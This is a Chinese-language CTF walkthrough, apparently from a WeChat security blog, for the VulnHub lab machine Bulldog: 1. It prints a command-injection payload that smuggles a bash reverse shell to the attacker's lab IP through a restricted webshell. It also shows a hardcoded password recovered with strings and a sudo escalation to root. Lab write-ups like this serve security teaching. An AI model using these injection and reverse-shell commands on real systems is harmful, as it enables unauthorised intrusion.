大余安全
一个每日分享渗透小技巧的公众号
靶机地址:https://www.vulnhub.com/entry/bulldog-1,211/
靶机难度:初级(CTF)
靶机发布日期:2017年8月28日
靶机描述:
Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don't you find out?
This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!
Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That's my only hint
Made by Nick Frichette (frichetten.com) Twitter: @frichette_n
I'd highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn't have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:
我们已经找到了此次CTF目标计算机IP地址:192.168.56.140
nmap发现开放了23、80、8080端口...
法斗....
这是说解雇了所有技术人员,因为发现被入侵了...
dirb爆破发现了admin和devURL...
这是一个登陆页面...admin默认密码无法登录...
sql注入也不行...
意思是说APT利用了Web服务器中的一个漏洞...他们从新服务器中完全删除PHP...也不会使用PHPMyAdmin或任何其他流行的CMS系统..
点进去
需要服务器验证才能使用...
在dev前端源码发现了MD5值...
等等,发现了nick/bulldog sarah/bulldoglover等...这里账号已经前面就有了,邮箱地址前面就是账号...
两个账号都能登录...
这里我使用了nick/bulldog登录...无权编辑任何内容...
我返回webshell发现可以使用了...应该是登录了问题
ifconfig
ls
echo
pwd
cat
rm
这里给了六个命令,执行别的都不行...
二、提权
ls &&echo "bash -i >& /dev/tcp/192.168.56.103/1234 0>&1" | bash
成功提shell,这里很多种玩的方法,任你们玩...
发现bulldogaadmin...可以提权...
find / -user bulldogadmin 2>/dev/null
第一眼看到了customPermissionApp,比较显眼...看它
使用exiftool没安装...使用了strings查看...
直接获得密码:
SUPERultimatePASSWORDyouCANTget
可以看到可以使用sudo...需要TTY...
python提到TTY之后,提示我可以直接提权了...
成功提到root权限,并查看flag...
比较简单的一台靶机...加油!
由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
原文始发于微信公众号(大余安全):VulnHub-Bulldog: 1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论